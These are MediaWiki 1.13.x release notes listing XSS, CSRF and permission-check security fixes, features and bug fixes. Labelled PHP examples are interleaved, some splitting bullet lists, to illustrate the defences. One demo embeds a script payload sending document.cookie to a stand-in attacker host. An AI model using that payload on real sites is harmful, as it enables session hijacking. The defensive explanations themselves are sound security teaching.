= MediaWiki release notes =

For upgrade instructions please see the UPGRADE file in this directory.

== MediaWiki 1.13.4 ==

February 7, 2009

This is a security update to the Summer 2008 snapshot release of MediaWiki.

MediaWiki is now using a "continuous integration" development model with
quarterly snapshot releases. The latest development code is always kept
"ready to run", and in fact runs our own sites on Wikipedia.

Release branches will continue to receive security updates for about a year
from first release, but nonessential bugfixes and feature developments will
be made on the development trunk and appear in the next quarterly release.

Those wishing to use the latest code instead of a branch release can obtain
it from source control: http://www.mediawiki.org/wiki/Download_from_SVN

== Changes since 1.13.3 ==

A number of cross-site scripting (XSS) security vulnerabilities were
discovered in the web-based installer (config/index.php). These
vulnerabilities all require a live installer -- once the installer has been
used to install a wiki, it is deactivated.

Note that cross-site scripting vulnerabilities can be used to attack any
website in the same cookie domain. So if you have an uninstalled copy of
MediaWiki on the same site as an active web service, MediaWiki could be used
to attack the active service. If you are hosting an old copy of MediaWiki
that you have never installed, you are advised to remove it from the web.

== Changes since 1.13.2 ==

David Remahl of Apple's Product Security team has identified a number of
security issues in previous releases of MediaWiki. Subsequent analysis by the
MediaWiki development team expanded the scope of these vulnerabilities. The
issues with a significant impact are as follows:

* An XSS vulnerability affecting all MediaWiki installations between 1.13.0
  and 1.13.2. [CVE-2008-5249]
* A local script injection vulnerability affecting Internet Explorer clients
  for all MediaWiki installations with uploads enabled. [CVE-2008-5250]
* A local script injection vulnerability affecting clients with SVG
  scripting capability (such as Firefox 1.5+), for all MediaWiki
  installations with SVG uploads enabled. [CVE-2008-5250]
* A CSRF vulnerability affecting the Special:Import feature, for all
  MediaWiki installations since the feature was introduced in 1.3.0.
  [CVE-2008-5252]

XSS (cross-site scripting) vulnerabilities allow an attacker to steal an
authorised user's login session, and to act as that user on the wiki. The
authorised user must visit a web page controlled by the attacker in order to
activate the attack. Intranet wikis are vulnerable if the attacker can
determine the intranet URL.

Local script injection vulnerabilities are like XSS vulnerabilities, except
that the attacker must have an account on the local wiki, and there is no
external site involved. The attacker uploads a script to the wiki, which
another user is tricked into executing, with the effect that the attacker is
able to act as the privileged user.

CSRF vulnerabilities allow an attacker to act as an authorised user on the
wiki, but unlike an XSS vulnerability, the attacker can only act as the user
in a specific and restricted way. The present CSRF vulnerability allows
pages to be edited, with forged revision histories. Like an XSS
vulnerability, the authorised user must visit the malicious web page to
activate the attack.

These four vulnerabilities are all fixed in this release.

David Remahl also reminded us of some security-related configuration
issues:

* By default, MediaWiki stores a backup of deleted images in the
  images/deleted directory. If you do not want these images to be publicly
  accessible, make sure this directory is not accessible from the web.
  MediaWiki takes some steps to avoid leaking these images, but these
  measures are not perfect.
* Set display_errors=off in your php.ini to avoid path disclosure via PHP
  fatal errors. This is the default on most shared web hosts.
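The notes above describe the Special:Import CSRF hole but not the defence
that closes it. The following is an added example, not MediaWiki's own code:
it shows the shape of a session-bound anti-CSRF token check for a
state-changing form such as an import. The function and field names
(issueEditToken, matchEditToken, wpEditToken) and the HMAC construction are
this example's own assumptions, and it needs PHP 7.1 or later.

```php
<?php
// Added example, not MediaWiki's own code. A page on another site can make
// the victim's browser submit this form, but it cannot read the victim's
// session, so it cannot produce a token bound to that session.

// Mint the token for a session: an HMAC over the session id with a
// server-side secret, so it is tied to one session and cannot be forged or
// replayed from another.
function issueEditToken(string $sessionId, string $secret): string {
    return hash_hmac('sha256', $sessionId, $secret);
}

// Compare a submitted token in constant time; an absent field (null) fails.
function matchEditToken(?string $submitted, string $sessionId, string $secret): bool {
    if ($submitted === null) {
        return false;
    }
    return hash_equals(issueEditToken($sessionId, $secret), $submitted);
}

// An import handler: the state change happens only on a POST that carries a
// valid token. Refusing GET matters on its own, because a GET can be
// triggered by an <img> tag on the attacker's page without any form at all.
function handleImport(array $request, string $sessionId, string $secret): string {
    if (($request['method'] ?? '') !== 'POST') {
        return 'refused: import must be POSTed';
    }
    if (!matchEditToken($request['wpEditToken'] ?? null, $sessionId, $secret)) {
        return 'refused: missing or invalid edit token';
    }
    return 'imported ' . count($request['pages'] ?? []) . ' page(s)';
}

// Constructed inputs. In a real wiki the session id comes from the session
// cookie and the secret from server-side storage, never from the request.
$sessionId = 'sess-victim-0123';
$secret    = bin2hex(random_bytes(16));

// Request forged from an attacker-controlled page: the attacker cannot read
// the token, so the best it can do is guess one.
$forged = ['method' => 'POST', 'pages' => ['Main_Page'], 'wpEditToken' => 'guess'];
echo handleImport($forged, $sessionId, $secret), "\n";

// The same request as rendered by the wiki's own form, token included.
$genuine = $forged;
$genuine['wpEditToken'] = issueEditToken($sessionId, $secret);
echo handleImport($genuine, $sessionId, $secret), "\n";
```

The forged request is refused and the genuine one is accepted. Binding the
token to the session (rather than using one site-wide value) is what stops an
attacker who holds an account of their own from reading their own token and
submitting it on a victim's behalf.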
* Enabling MediaWiki's debugging features, such as $wgShowExceptionDetails,
  may lead to path disclosure.

Other changes in this release:

* Avoid fatal error in profileinfo.php when not configured.
* Add a .htaccess to deleted images directory for additional protection
  against exposure of deleted files with known SHA-1 hashes on default
  installations.
* Avoid streaming uploaded files to the user via index.php. This allows
  security-conscious users to serve uploaded files via a different domain,
  and thus client-side scripts executed from that domain cannot access the
  login cookies. Affects Special:Undelete, img_auth.php and thumb.php.
* When streaming files via index.php, use the MIME type detected from the
  file extension, not from the data. This reduces the XSS attack surface.
* Blacklist redirects via Special:Filepath. Such redirects exacerbate any
  XSS vulnerabilities involving uploads of files containing scripts.
* Internationalisation updates.

== Changes since 1.13.1 ==

* Security: Work around misconfiguration by requiring strict comparisons
  for in_array in User::isAllowed().
* (bug 14944) Added $wgShellLocale for configuration of an appropriate
  locale to use for LC_CTYPE during shell invocation. For servers that
  don't have en_US.utf8. Also added locale detection during install.
* Localisation updates
* Security: Fixed XSS vulnerability in useskin parameter.

== Changes since 1.13.0 ==

* (bug 15460) Fixed intermittent deadlock errors and poor concurrent
  performance for installations without memcached.
* (bug 13770) Fixed DOM module detection for installations with both dom
  and domxml.
* (bug 15148) Fixed Special:BlockIP for PostgreSQL
* Fixed SQLite support for non-memcached installations
* Localisation updates, Achinese (ace) added.

== Changes since 1.13.0rc2 ==

* (bug 13770) Fixed incorrect detection of PHP's DOM module
* Fix regression from r37834: accesskey tooltip hint should be given for
  the minor edit and watch labels on the edit page.
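The 1.13.4 warning about live installers and the 1.13.3 configuration
reminders (deleted-image directory, display_errors, $wgShowExceptionDetails)
can all be checked mechanically. The script below is an added example, not
part of MediaWiki; it assumes the 1.13 layout (config/, images/deleted/ and
LocalSettings.php under the wiki root) and an Apache deployment where a
.htaccess file is what denies web access to images/deleted. It reads files
and ini settings only and changes nothing.

```php
<?php
// Added example, not part of MediaWiki. Run as: php audit.php /path/to/wiki
// The CLI may load a different php.ini than the web SAPI; point it at the
// web server's php.ini with -c so the display_errors check is meaningful.

function auditWiki(string $root): array {
    $findings = [];

    // 1.13.4: the web installer is only dangerous while it is present and
    // usable. config/index.php without a LocalSettings.php means it is live.
    if (is_file("$root/config/index.php")) {
        $findings[] = is_file("$root/LocalSettings.php")
            ? 'config/index.php still present after installation; delete the config/ directory'
            : 'LIVE installer: config/index.php present and the wiki is not installed; remove this copy from the web';
    }

    // 1.13.3: deleted-image backups must not be web-reachable. The release
    // ships a .htaccess there by default; check it survived deployment.
    $deleted = "$root/images/deleted";
    if (is_dir($deleted) && !is_file("$deleted/.htaccess")) {
        $findings[] = 'images/deleted has no .htaccess; make sure the web server denies access to it';
    }

    // 1.13.3: display_errors leaks filesystem paths in fatal errors. Values
    // such as "stderr" also display, so anything not clearly off counts as on.
    $displayErrors = strtolower((string) ini_get('display_errors'));
    if (!in_array($displayErrors, ['', '0', 'off', 'false', 'no'], true)) {
        $findings[] = "display_errors is '$displayErrors'; set display_errors=off in php.ini";
    }

    // 1.13.3: debugging switches in LocalSettings.php also disclose paths.
    $settings = "$root/LocalSettings.php";
    if (is_file($settings)
        && preg_match('/^\s*\$wgShowExceptionDetails\s*=\s*true\s*;/mi', file_get_contents($settings))) {
        $findings[] = '$wgShowExceptionDetails is enabled; turn it off on a production wiki';
    }

    return $findings;
}

$findings = auditWiki(rtrim($argv[1] ?? '.', '/'));
if ($findings === []) {
    echo "no findings\n";
} else {
    foreach ($findings as $finding) {
        echo "- $finding\n";
    }
}
```

The .htaccess check is only meaningful under Apache with AllowOverride
enabled for that directory; on other servers, or where overrides are
disabled, the deny rule has to live in the main server configuration and
this check should be replaced by a request against the directory from
outside.

The 1.13.3 change to take the streamed file's MIME type from its extension
rather than from its data is easy to misread as a loss of accuracy. The
following added example (not MediaWiki code) shows why it is the safer
choice: a file uploaded under an image name whose bytes are HTML must not
be served as text/html from the wiki's own origin, or the browser runs the
embedded script with the wiki's cookies. The sniffer here is a deliberately
naive stand-in for data-based detection, the extension table is the
example's own, and the X-Content-Type-Options header is an addition the
release notes do not mention.

```php
<?php
// Added example, not MediaWiki code. Relies on the upload extension
// whitelist: only extensions the wiki accepts ever reach this lookup.

const MIME_BY_EXTENSION = [
    'png' => 'image/png', 'jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
    'gif' => 'image/gif', 'svg' => 'image/svg+xml', 'pdf' => 'application/pdf',
];

// Extension-based lookup; anything unknown falls back to an inert type.
function mimeFromExtension(string $filename): string {
    $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    return MIME_BY_EXTENSION[$ext] ?? 'application/octet-stream';
}

// Naive content sniffer standing in for data-based detection. "Recognising"
// HTML by its markup is exactly what turned an upload into an XSS payload
// once the result was used as the Content-Type.
function mimeFromData(string $bytes): string {
    $head = strtolower(substr($bytes, 0, 512));
    if (strpos($head, '<svg') !== false) {
        return 'image/svg+xml';
    }
    if (preg_match('/<(!doctype html|html|script|body)/', $head)) {
        return 'text/html';
    }
    if (substr($bytes, 0, 8) === "\x89PNG\r\n\x1a\n") {
        return 'image/png';
    }
    return 'application/octet-stream';
}

// Headers a streaming endpoint (index.php, img_auth.php, thumb.php) sends.
// $trustData selects the pre-1.13.3 behaviour (sniff) or the fixed one.
function streamHeaders(string $filename, string $bytes, bool $trustData): array {
    $type = $trustData ? mimeFromData($bytes) : mimeFromExtension($filename);
    $headers = [
        'Content-Type'           => $type,
        // Tell browsers (IE8+ introduced this) not to second-guess the type.
        'X-Content-Type-Options' => 'nosniff',
    ];
    // Anything not known to be safe inline is offered as a download instead.
    if ($type === 'application/octet-stream') {
        $safeName = str_replace('"', '', basename($filename));
        $headers['Content-Disposition'] = 'attachment; filename="' . $safeName . '"';
    }
    return $headers;
}

// Constructed malicious upload: an image name carrying an HTML body.
$name  = 'diagram.png';
$bytes = "<html><script>document.location='http://attacker.invalid/?c='+document.cookie</script></html>";

print_r(streamHeaders($name, $bytes, true));   // trust the data
print_r(streamHeaders($name, $bytes, false));  // trust the extension
```

With the data trusted, the sniffer reports text/html and the wiki serves
the script; with the extension trusted it is sent as image/png, which the
browser will fail to decode but never execute. Serving uploads from a
separate cookie-less domain, as the notes suggest, is the stronger defence
because it holds even when the type is wrong.

The 1.13.2 entry above about strict comparisons in User::isAllowed() is
terse. The example below is an added illustration, not MediaWiki's code: the
permission table, rights list and isAllowed() shape are simplified
stand-ins, and the misconfigured line is a plausible way a non-string right
name ends up in the list. On PHP 5 and 7 a loose in_array() then matches
every action; PHP 8 changed string-to-number comparison so the loose check
no longer misfires there, but the strict one is correct on every version.

```php
<?php
// Added example, not MediaWiki code: the loose-comparison pitfall behind the
// strict in_array() change in User::isAllowed().

// A plausible misconfiguration: the admin appended to the rights array
// instead of writing $wgGroupPermissions['*']['read'] = true. PHP stores the
// appended value under integer key 0.
$wgGroupPermissions = [
    '*'    => ['read' => true, 'edit' => false],
    'user' => ['edit' => true],
];
$wgGroupPermissions['*'][] = true;   // meant "read", actually [0 => true]

// Collect the names of rights switched on for the given groups.
function rightsForGroups(array $permissions, array $groups): array {
    $rights = [];
    foreach ($groups as $group) {
        foreach ($permissions[$group] ?? [] as $right => $enabled) {
            if ($enabled) {
                $rights[] = $right;   // an int when the table is malformed
            }
        }
    }
    return $rights;
}

// Before the fix: loose in_array(). On PHP 5 and 7, 'delete' == 0 is true,
// so one stray integer right grants every action to everyone in the group.
function isAllowedLoose(string $action, array $rights): bool {
    return in_array($action, $rights);
}

// After the fix: strict comparison matches the exact string only.
function isAllowedStrict(string $action, array $rights): bool {
    return in_array($action, $rights, true);
}

$anonRights = rightsForGroups($wgGroupPermissions, ['*']);
foreach (['read', 'edit', 'delete'] as $action) {
    printf("%-6s loose=%s strict=%s\n", $action,
        var_export(isAllowedLoose($action, $anonRights), true),
        var_export(isAllowedStrict($action, $anonRights), true));
}
```

The strict version answers true only for 'read'. The lesson generalises:
any membership or lookup check on attacker-influenced or operator-supplied
data in PHP should use strict comparison, since loose comparison also makes
"0e123" equal "0e456" and "abc" equal 0 on older versions.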
* Updated Chinese simplified/traditional conversion tables

== Changes since 1.13.0rc1 ==

* $wgForwardSearchUrl has been removed entirely. Documented setting since
  1.4 has been $wgSearchForwardUrl.
* (bug 14907) DatabasePostgres::fieldType now defined.
* (bug 14966) Fix SearchEngineDummy class for silently non-functional
  search on SQLite instead of a horribly fatal, breaking error.
* (bug 14987) Only fix double redirects on page move when the checkbox is
  checked
* (bug 13376) Use $wgPasswordSender, not $wgEmergencyContact, as return
  address for page update notification mails.
* API: Registration time of users registered before the DB field was
  created is now shown as empty instead of the current time.
* (bug 14904) Fragments were lost when redirects were fixed.
* Added magic word __STATICREDIRECT__ to suppress the redirect fixer
* (bug 15035) Revert English linkTrail to /^([a-z]+)(.*)$/sD, as it was
  before r36253. Multiple reports of breakage due to old (pre-5.0) PCRE
  libraries, both bundled with PHP and packaged with distros such as RHEL.
* (bug 14944) Shell invocation of external programs such as ImageMagick
  convert was broken in PHP 5.2.6, if the server had a non-UTF-8 locale.

== Changes since 1.12 ==

=== Configuration changes in 1.13 ===

* New option $wgFeed can be set false to turn off syndication feeds
* (bug 5745) Special:Whatlinkshere now shows up to
  $wgMaxRedirectLinksRetrieved links through each redirect instead of
  hardcoded 500
* Set $wgUploadSizeWarning to false by default
* Added $wgLBFactoryConf, for generic configuration of multi-master wiki
  farms
* Removed $wgAlternateMaster, use $wgLBFactoryConf
* (bug 13562) Misspelled option $wgUserNotifedOnAllChanges changed to
  $wgUserNotifiedOnAllChanges
* (bug 12860) New option $wgSitemapNamespaces allows sitemaps to be
  generated for only some namespaces
* Removed the emailconfirmed implicit group by default. To re-add it, use:
  $wgAutopromote['emailconfirmed'] = APCOND_EMAILCONFIRMED;
  in your LocalSettings.php.
* (bug 2396) New shared database configuration variables. $wgSharedPrefix
  allows you to use a shared database with a different prefix. Or you can
  now use a local database and use prefixes to separate wiki and the shared
  tables. And the new $wgSharedTables variable allows you to specify a list
  of tables to share.
* Automatic edit summaries can be disabled with $wgUseAutomaticEditSummaries
* Duplicates of images are now shown on the image page
* $wgRCFilterByAge allows for the list of dates in recent changes special
  pages to be filtered to only those within the range of $wgRCMaxAge
* $wgRCLinkLimits and $wgRCLinkDays allow for customization of the list
  and limits displayed on the recent changes special pages
* The "createpage" permission is no longer required when uploading if the
  target image page already exists
* $wgMaximumMovedPages restricts the number of pages that can be moved at
  once (default 100) with the new subpage-move functionality of
  Special:Movepage
* Hooks display in Special:Version is now disabled by default, use
  $wgSpecialVersionShowHooks = true; to enable it.
* $wgActiveUserEditCount sets the number of edits that must be performed
  over a certain number of days to be considered active
* $wgActiveUserDays is that number of days
* $wgRateLimitsExcludedGroups has been deprecated in favor of
  $wgGroupPermissions[]['noratelimit']. The former still works, however.
* New $wgGroupPermissions option 'move-subpages' added to control
  bulk-moving subpages along with pages. Assigned to 'user' and 'sysop' by
  default.
* New $wgRC2UDPOmitBots allows user to omit bot edits from UDP output.
  Default: false
* Removed $wgEnableCascadingProtection option. Disabling cascading
  protection is no longer possible.
* $wgMessageCacheType now defines the type of cache used by the
  MessageCache class; previously it was chosen based on $wgParserCacheType
* $wgExtensionAliasesFiles option to simplify adding aliases to special
  pages provided by extensions, in a similar way to $wgExtensionMessagesFiles
* Added $wgXMLMimeTypes, an array of XML mimetypes we can check for with
  MimeMagic.
* Added $wgDirectoryMode, which allows for setting the default CHMOD value
  when creating new directories.
* (bug 14843) $wgCookiePrefix can be set by LocalSettings now; false (the
  default) keeps the current behaviour.

=== New features in 1.13 ===

* __HIDDENCAT__ on a category page causes the category to be hidden on the
  article page
* Do not show edit permissions errors on a red link click, just redirect to
  the article. This is so that readers who don't know what a red link is
  are not confused when they are told they are range-blocked.
* Add a new hook ImageBeforeProduceHTML to allow extensions to modify
  wikitext image syntax output
* (bug 13100) Added 'preloadtitle' parameter to action=edit&section=new
  that pre-fills the section title field
* (bug 13112) Added Special:RelatedChanges alias to
  Special:RecentChangesLinked
* (bug 13130) Moved edit token and autosummary fields above edit tools to
  reduce broken form submissions
* Add --old-redirects-only option to maintenance/refreshLinks.php, to add
  old redirects to the redirect table
* Add links to page and file deletion forms to edit predefined delete
  reasons
* (bug 13269) Added MediaWiki:Uploadfooter to the bottom of Special:Upload
* (bug 2815) Search results for media now use thumbnail instead of text
  extract
* When a page doesn't exist, the tab should say "create", not "edit"
* (bug 12882) Added a span with class "patrollink" around "Mark as
  patrolled" link on diffs
* Magic word formatnum can now take raw suffix to undo formatting
* Add updatelog table to reliably permit updates that don't change the
  schema
* Add category table to allow better tracking of category membership counts
** (bug 1212) Give correct membership counts on the pages of large
   categories
** Use category table for more efficient display of Special:Categories
* (bug 1459) Search for duplicate files by hash: Special:FileDuplicateSearch
* (bug 9447) Added hooks for search result headings
* Image redirects are now enabled by default
* (bug 13450) Email confirmation can now be canceled before the expiration
* (bug 13490) Show upload/file size limit on upload form
* Redesign of Special:UserRights
* Make rev_deleted log entries more intelligible
* (bug 6943) Added PAGESINCATEGORY: magic word
* (bug 13604) Added Special:ListGroupRights
* (bug 6332, 8617) Added message 'mainpage-description' as duplicate of
  'mainpage' and added it to message 'sidebar'
* Automatically add old redirects to the redirect table when needed
* (bug 6934) Allow inclusions, links, redirects to be separately toggled on
  or off on Special:WhatLinksHere
* Cache image redirects
* (bug 10457) Organize Special:SpecialPages into sections
* Add a new hook EditPageBeforeConflictDiff to allow extensions like
  FCKeditor to modify the output for edit conflicts
* Add class="nested" for <fieldset>s so fieldsets inside fieldsets get a
  slightly less huge margin and padding
* (bug 13527) Use sitemaps.org format 0.9 instead of a Google-specific
  format
* Allow \C and \Q as TeX commands to match \R, \N, \Z
* On Special:UserRights, when you can add a group you can't remove or
  remove one you can't add, a notice is printed to warn you
* (bug 12698) Create PAGESIZE parser function, to return the size of a page
* Allow the "log in / create account" link in the toolbar to have different
  text from Special:UserLogin title (new message 'nav-login-createaccount')
* Say "log in / create account" if an anonymous user can create an account,
  otherwise just "log in", consistently across skins
* Special:Shortpages and Special:Longpages now return pages in all content
  namespaces, not just NS_MAIN.
* (bug 889) Improve conflict-handling between shared upload repository and
  local one
* Update documentation links in auto-generated LocalSettings.php
* (bug 13584) The new hook SkinTemplateToolboxEnd was added.
* (bug 709) Cannot rename/move images and other media files [EXPERIMENTAL]
* Custom rollback summaries now accept the same arguments as the default
  message
* (bug 12542) Added hooks for expansion of Special:Listusers
* Drop-down AJAX search suggestions (turn on $wgEnableMWSuggest)
* More relevant search snippets (turn on $wgAdvancedSearchHighlighting)
* (bug 13950) Allow users to watch the user/talk pages of users they block.
* (bug 13970) Allow MonoBook-based skins to specify their own print
  stylesheet
* Show image links on Special:Whatlinkshere
* Use rel="start", "prev", "next" appropriately on Pager-based pages
* Add support for SQLite
* AutoAuthenticate hook renamed to UserLoadFromSession
* (bug 13232) importScript(), importStylesheet() funcs available to custom
  JS
* (bug 13095) Search by first letters or digits in [[Special:Categories]]
* Users moving a page can now move all subpages automatically as well
* (bug 14259) Localisation message for upload button on Special:Import is
  now 'import-upload' instead of 'upload'
* Add information about user group membership to Special:Preferences
* (bug 14146) Wrap usage section on imagepages into <div>s.
* New layout for Special:Specialpages. Restricted pages are marked but not
  separated from other pages in their group.
* (bug 14263) Show a diff of the revert on rollback notification page.
* (bug 13434) Show a warning when hash-identical files exist
* Sidebar is now cached for all languages
* The User class now contains a public function called isActiveEditor. It
  reports whether a user is active, i.e. has made at least
  $wgActiveUserEditCount edits in the last $wgActiveUserDays days.
* SpecialSearchResults hook now passes results by reference, so they can be
  changed by extensions.
* Add a new hook LinkerMakeExternalLink to allow extensions to modify the
  output of external links.
* (bug 14132) Allow user to disable bot edits from being output to UDP.
* (bug 14328) jsMsg() within Wikibits now accepts a DOM object, not just a
  string
* (bug 14558) New system message (emailuserfooter) is now added to the
  footer of e-mails sent with Special:Emailuser
* Add support for Hijri (Islamic) calendar
* Add a new hook LinkerMakeExternalImage to allow extensions to modify the
  output of external (hotlinked) images.
* (bug 14604) Introduced the following features for the LanguageConverter:
  Multi-tag support, single conversion flag, remove conversion flag on a
  single page, description flag, variant name, multi-variant fallbacks.
* Add zh-mo and zh-my variants for the zh language
* (bugs 4832, 9481, 12890) Special:Recentchangeslinked now has all options
  that are in Special:Recentchanges
* Allow an $error message to be passed to ArticleDelete hook
* Allow extensions to modify the user creation form by calling
  addInputItem();
* Add meta generator tag to HTML output
* MediawikiPerformAction hook is now passed the Mediawiki object
* Added blank special page Special:BlankPage for benchmarking, etc.
* Foreign repo file descriptions and thumbnails are now cached.
* (bug 11732) Allow localisation of edit button images
* Allow the search box, toolbox and languages box in the Monobook sidebar
  to be moved around arbitrarily using special sections in
  [[MediaWiki:Sidebar]]: SEARCH, TOOLBOX and LANGUAGES
* Add a new hook NormalizeMessageKey to allow extensions to replace
  messages before the database is potentially queried
* (bug 9736) Redirects on Special:Fewestrevisions are now marked as such.
* New date/time formats in Cs localization according to ČSN and PČP.
* Special:Recentchangeslinked now includes changes to transcluded pages and
  displayed images; also, the "Show changes to pages linked" checkbox now
  works on category pages too, showing all links that are not
  categorizations
* (bug 4578) Automatically fix redirects broken by a page move

=== Bug fixes in 1.13 ===

* (bug 10677) Add link to the file description page on the shared
  repository
* (bug 13084) Increase size of source/destination filename fields in upload
  form
* (bug 13115) rebuildrecentchanges should print the current value of
  $wgRCMaxAge
* (bug 13140) Show parent categories in category namespace
* (bug 13149) Correctly format 'fileexists' message on Upload page
* Make the default filepageexists message accurate
* (bug 12988) $wgMinimalPasswordLength no longer breaks create user by email
* (bug 13022) Fix upload from URL on PHP 5.0.x
* (bug 13132) Unable to unprotect pages protected with earlier versions of
  MediaWiki
* (bug 12723) OpenSearch description name now uses more compact language
  code to avoid passing the length limit as often, is customizable per site
  via 'opensearch-desc' message.
* (bug 13135) Special:Userrights now passes IDs through form submission to
  allow functionality on not-quite-right usernames
* (bug 12575) Prevent duplicate patrol log entries from being created
* (bug 13174) __HIDDENCAT__ now applies only to category pages
* (bug 13031) Add links to user pages in e-mail form
* (bug 13147) Description for categoriespagetext (used in
  Special:Categories) reworded
* (bug 11561) Fix fatal error when calling action=revert on a non-image page
* (bug 12430) Fix call to private method LinkFilter::makeRegex fatal error
  in maintenance/cleanupSpam.php
* All skins should have the "mediawiki" class on the body element
* (bug 13019) Message cache for some extensions not loaded at time of
  editing
* (bug 13247) Prettified ISBN links
* maintenance/refreshLinks.php did not fix page_id 1 with the --new-only
  option
* (bug 13110) Don't show "Permission error" page if the edit is already
  rolled back when using rollback
* (bug 13012) Use content messages for block options when generating the
  recentchanges entry
* (bug 13274) Change links for messages to ucfirst
* (bug 13273) Un-hardcode some punctuation (add new messages
  colon-separator, autocomment-prefix)
* Parse MediaWiki message translations with a correct language setting on
  preview
* (bug 13281) Treat X-Forwarded-For, Client-ip and User-Agent headers as
  case-insensitive names.
* Adding the fix for lists in RTL wikis to more skins, and fixing the image
  toc
* (bug 8157) Remove redirects from Special:Unusedtemplates. Patch by WebBoy.
* (bug 10721) Duplicate section anchors with differing case now
  disambiguated for Internet Explorer's sake and standards compliance
* (bug 13298) Tighter limits on Special:Newpages limits when embedding
* Email subject in content language instead of sending user's UI language
* (bug 13251) Allow maintenance rebuild scripts to work with Postgres
* (bug 2084) Fixed incorrect regex to match redirects
* (bug 3131) Manually-specified upload destination filename is no longer
  overwritten by browsing for a file after you wrote it.
* (bug 7251) Sidebars generated by MediaWiki:Sidebar now have the class
  'generated-sidebar'.
* (bug 13265) Media handler is missing 'image/x-bmp'
* (bug 13407) MediaWiki:Powersearch is used in two places
* (bug 13403) Fix cache invalidation of history pages when old revisions
  change
* (bug 11563) Deprecated SearchMySQL4 class; merged code to SearchMySQL
* (bug 12801) Fix link in subtitle message in AJAX search
* (bug 13428) Fix regression in protection form layout HTML validity
* (bug 9403) Sanitize newlines from search term input
* (bug 13429) Separate date and time in message sp-newimages-showfrom
* (bug 13137) Allow setting 'editprotected' right separately from
  'protect', so groups may optionally edit protected pages without having
  'protect' perms
* Disallow deletion of big pages by means of moving a page to its title and
  using the "delete and move" option.
* (bug 13466, 13632) White space differences not shown in diffs
* (bug 1953) Search form now honors namespace selections more reliably
* (bug 12294) Namespace class renamed to MWNamespace for PHP 5.3
  compatibility
* PHP 5.3 compatibility fix for wfRunHooks() called with no parameters
* (bug 6447) Trackbacks now work with transactional tables, if enabled
* (bug 6892, 7147) Trackback error handling, optional fields more robust
* (bug 6813) Don't break HTML validator when using trackbacks
* Fix for size checks on SVG images with global 'stroke-width' attribute
* (bug 11874) Inline CSS with !important no longer broken
* (bug 1600) Strip extra == section markup == in new-comment field
* (bug 11325) Wrapped page titles in MonoBook skin spaced more nicely
* (bug 12077) Fix HTML nesting for TOC
* (bug 344) Purge cache for talk/article pages when deleting the other tab
* (bug 13436) Treat image captions correctly when they include option
  keywords (like ending with "px" or starting with "upright")
* Trackback display formatting fixed
* Don't die when single-element arrays are passed to SQL query constructors
  that have an array index other than 0
* (bug 13522) Fix fatal error in Parser::extractTagsAndParams
* (bug 13532) Use proper timestamp call when reverting images
* (bug 13543) Updated FAQ link in the installer sidebar
* (bug 13540) Date format in confirmation e-mail now matches message
  language
* (bug 13554) PHP Notice in old pre-processor when list item is empty.
* (bug 13556) Don't show a blank form if no image is attached in
  Special:Upload
* (bug 13576) maintenance/rebuildrecentchanges.php fails
* (bug 13441) Allow Special:Recentchanges to show bots only
* (bug 13431) Show true message source in Special:Allmessages&ot=php / xml
* (bug 13463) Login successful page doesn't use user's preferred interface
  language
* (bug 13630) Fixed warnings for pass by reference at call time in
  Special:Revisiondelete when generating the log entry.
* (bug 12064) BeforePageDisplay hook is now called for all skins
* (bug 13624) Fix regression with manual thumb= parameter on images
* (bug 11039) Add missing labels on protection form
* (bug 13458) Preview/edit toolbar spacing now works consistently
* (bug 13433) Fix action=render on Image: pages
* (bug 13678) Fix CSS validation for Monobook
* (bug 13684) Links in Special:ListGroupRights should be in content language
* (bug 13690) Fix PHP notice on accessing some URLs
* Hide (undo) link if user isn't able to edit page
* Invalidate cache of pages that include images via redirects on upload
* (bug 13705) Don't show rollback link in page history on incorrect
  revisions
* (bug 13708) Don't set "Search results" title when loading Special:Search
  without query
* (bug 13736) Don't show MediaWiki:Anontalkpagetext on non-existent IP
  addresses
* (bug 13728) Don't trim initial whitespace during section edits
* (bug 13727) Don't delete log entries from recentchanges on page deletion
* (bug 13752) Redirects to sections now work again
* (bug 13725) Upload form watch checkbox state set correctly with wpDestFile
* (bug 13756) Don't show the form and navigation links of Special:Newpages
  if the page is included
* When hiding things on WhatLinksHere, generated URLs should hide them too
* Properly escape search terms with regex chars so they appear highlighted
  in search results
* (bug 13768) pt_title field encoding fixed
* Do not display empty columns on Special:UserRights if all groups are
  changeable or all unchangeable
* Fix fatal error on calling PAGESINCATEGORY with invalid category name
* (bug 13793) Special:Whatlinkshere filtered after paginating instead of
  before
* (bug 13796) Show links to parent pages even if some of them are missing
* (bug 13816) Filter by main namespace doesn't work on WhatLinksHere
* (bug 13822) Fatal error on some pages when calculating subpage subtitle
* (bug 13824) AJAX search suggestion now works with non-SkinTemplate skins
* Added 'application/x-dia-diagram' to MediaWiki's known MIME types
* (bug 13866) Fix invalid attribute in skins/common/shared.css
* Hide edit section links on Special:Undelete
* (bug 13860) Fix "Justify paragraphs" option for Modern skin
* (bug 13168) Accessibility links in Modern skin link to wrong anchor id
* (bug 13185) No line break after 'subpages' class in Modern skin
* (bug 13583) No "poweredby" in Modern skin
* (bug 13880) "Printable" link in Modern skin now formats as print mode
* (bug 13885) Bump default $wgSVGMaxSize from 1024 to 2048 pixels
* (bug 13891) Show categories box even if all categories are hidden and
  user has "show hidden categories" option on
* (bug 13915) Undefined variable $wltsfield in includes/SpecialWatchlist.php
* (bug 13913) Special:Whatlinkshere now has correct HTML markup
* (bug 13905) Blacklist Mac IE from HttpOnly cookies; it eats them sometimes
* (bug 13922) Fix bad HTML on empty Special:Prefixindex and Special:Allpages
* (bug 13924) Fix bad HTML on power search form
* (bug 13820) Fix updater for rev_parent_id population
* (bug 13925) Fix bad HTML on search results list
* (bug 13934) Fixing the link to GNU General Public License Version 2
* Show correct accesskey prefix for Firefox 3 beta (Alt-Shift-, not Alt-)
* (bug 13949) Special:PrefixIndex/AllPages paging links contain invalid XML
* (bug 13770) Use Preprocessor_Hash by default to avoid missing DOM module
  errors
* (bug 13982) Disable ccmeonemails preference when user-to-user mails
  disabled
* (bug 13615) Update case mappings and normalization to Unicode 5.1.0. Note
  that case mappings will only be used if the mbstring extension is not
  present.
* (bug 14044) Don't increment page view counters on views from bot users
* (bug 14042) Calling Database::limitResult() misplaced the comment in the
  log file
* (bug 14047) Fix regression in installer which hid DB-specific options.
  Also makes SQLite path configurable in the installer.
* (bug 13546) Follow image redirects on image page
* (bug 12644) Template list on edit page now sorted on preview
* (bug 14058) Support pipe trick for namespaces and interwikis with "-"
* Message name filter on Special:Allmessages now case-insensitive
* (bug 13943) Fix image redirect behaviour on image pages
